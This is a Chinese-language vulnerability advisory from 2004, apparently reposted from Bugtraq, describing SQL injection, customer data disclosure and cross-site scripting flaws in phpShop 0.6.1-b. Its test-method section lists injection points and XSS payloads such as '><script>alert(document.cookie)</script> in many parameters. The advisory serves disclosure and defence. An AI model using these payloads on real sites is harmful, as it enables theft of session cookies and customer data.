PHPShop Project多个安全漏洞
发布日期:2004-01-30
更新日期:2004-02-09
受影响系统:phpShop phpShop 0.6.1-b
描述:
BUGTRAQ ID:
9437
phpShop是一款基于PHP的电子商务程序,可方便的扩展WEB功能。
phpShop存在多个安全问题,远程攻击者可以利用这些漏洞攻击数据库,获得敏感信息,执行任意脚本代码。
具体问题如下:
1、SQL注入漏洞:
当更新会话时存在一个SQL注入问题,可以对"page"变量提交恶意SQL命令而修改原有SQL逻辑,同样对"product_id"和"offset"变量进行注入也存在同样问题。
2、用户信息泄露漏洞:
通过查询"account/shipto"模块,可获得大量客户信息。如果用户以合法帐户登录,也可能查看管理员信息。这些信息包括客户的地址,公司名等等信息。
3、跨站脚本执行攻击:
多个参数对用户提交的URI参数缺少充分过滤,提交包含恶意HTML代码的数据,可导致触发跨站脚本攻击,可能获得目标用户的敏感信息。
<*来源:JeiAr (
jeiar@kmfms.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=107428690818912&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
JeiAr (
jeiar@kmfms.com)提供了如下测试方法:
page=[Evil_Query]
page=shop/cart&func=cartAdd&product_id=[Evil_Query]
page=shop/browse&category_id=&offset=[Evil_Query]
page=account/shipto&user_info_id=[Valid User ID]
page=admin/index&GulfTech="><script>alert(document.cookie)</script>
page=shop/browse&category_id="><script>alert(document.cookie)</script>
func="><script>alert(document.cookie)</script>
login="><script>alert(document.cookie)</script>
page=account/shipto&user_info_id="><script>alert(document.cookie)</script>
page=shopper/index&module_description="><script>alert(document.cookie)</script>
page=shopper/menu&menu_label="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_list_mn="><script>alert(document.cookie)</script>
page=shopper/menu&modulename="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_group_list_mnu="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_group_form_mnu="><script>alert(document.cookie)</script>
page=vendor/index&module_description="><script>alert(document.cookie)</script>
page=vendor/index&menu_label="><script>alert(document.cookie)</script>
page=vendor/index&sess="><script>alert(document.cookie)</script>
page=vendor/index&leftbar_title_bgcolor="><script>alert(document.cookie)</script>
建议:
厂商补丁:
phpShop
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpshop.org/浏览次数:2760
严重程度:4(网友投票)